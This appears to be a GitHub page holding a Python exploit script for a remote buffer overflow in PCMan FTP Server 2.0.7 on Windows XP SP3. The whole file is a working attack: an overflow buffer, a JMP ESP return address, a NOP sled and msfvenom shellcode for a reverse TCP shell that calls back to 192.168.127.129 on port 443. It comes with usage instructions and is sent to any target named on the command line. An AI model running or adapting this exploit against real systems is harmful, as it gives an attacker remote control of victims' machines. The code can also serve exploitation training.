-
Notifications
You must be signed in to change notification settings - Fork 1
/
PCManFTPServer2.0.7-RemoteBufferOverflow.py
38 lines (38 loc) · 2 KB
/
PCManFTPServer2.0.7-RemoteBufferOverflow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python
#How To Use: python exploit.py [target][port]
import socket, sys
junk = '\x41' * 2006
eip = '\x34\x2F\xB3\x7C' #JMP ESP SHELL32.dll 7CB32F34 | Target OS: Win XP SP3 En
nop = '\x90' * 15
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.127.129 LPORT=443 -b '\x0a\x0d\xff\x00' -f c
shellcode = ("\xba\xc5\x95\x39\x1d\xdb\xcc\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x95\x9b\xdb\xe8\xe9\x4c\x99"
"\x13\x11\x8d\xfe\x9a\xf4\xbc\x3e\xf8\x7d\xee\x8e\x8a\xd3\x03"
"\x64\xde\xc7\x90\x08\xf7\xe8\x11\xa6\x21\xc7\xa2\x9b\x12\x46"
"\x21\xe6\x46\xa8\x18\x29\x9b\xa9\x5d\x54\x56\xfb\x36\x12\xc5"
"\xeb\x33\x6e\xd6\x80\x08\x7e\x5e\x75\xd8\x81\x4f\x28\x52\xd8"
"\x4f\xcb\xb7\x50\xc6\xd3\xd4\x5d\x90\x68\x2e\x29\x23\xb8\x7e"
"\xd2\x88\x85\x4e\x21\xd0\xc2\x69\xda\xa7\x3a\x8a\x67\xb0\xf9"
"\xf0\xb3\x35\x19\x52\x37\xed\xc5\x62\x94\x68\x8e\x69\x51\xfe"
"\xc8\x6d\x64\xd3\x63\x89\xed\xd2\xa3\x1b\xb5\xf0\x67\x47\x6d"
"\x98\x3e\x2d\xc0\xa5\x20\x8e\xbd\x03\x2b\x23\xa9\x39\x76\x2c"
"\x1e\x70\x88\xac\x08\x03\xfb\x9e\x97\xbf\x93\x92\x50\x66\x64"
"\xd4\x4a\xde\xfa\x2b\x75\x1f\xd3\xef\x21\x4f\x4b\xd9\x49\x04"
"\x8b\xe6\x9f\x8b\xdb\x48\x70\x6c\x8b\x28\x20\x04\xc1\xa6\x1f"
"\x34\xea\x6c\x08\xdf\x11\xe7\xf7\x88\x66\x76\x9f\xca\x98\x79"
"\xdb\x42\x7e\x13\x0b\x03\x29\x8c\xb2\x0e\xa1\x2d\x3a\x85\xcc"
"\x6e\xb0\x2a\x31\x20\x31\x46\x21\xd5\xb1\x1d\x1b\x70\xcd\x8b"
"\x33\x1e\x5c\x50\xc3\x69\x7d\xcf\x94\x3e\xb3\x06\x70\xd3\xea"
"\xb0\x66\x2e\x6a\xfa\x22\xf5\x4f\x05\xab\x78\xeb\x21\xbb\x44"
"\xf4\x6d\xef\x18\xa3\x3b\x59\xdf\x1d\x8a\x33\x89\xf2\x44\xd3"
"\x4c\x39\x57\xa5\x50\x14\x21\x49\xe0\xc1\x74\x76\xcd\x85\x70"
"\x0f\x33\x36\x7e\xda\xf7\x46\x35\x46\x51\xcf\x90\x13\xe3\x92"
"\x22\xce\x20\xab\xa0\xfa\xd8\x48\xb8\x8f\xdd\x15\x7e\x7c\xac"
"\x06\xeb\x82\x03\x26\x3e")
exp = junk + eip + nop + shellcode + nop
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(sys.argv[1]),int(sys.argv[2])))
s.recv(1024)
s.send(exp)
s.close()
print("\nExploit Completed :)\n")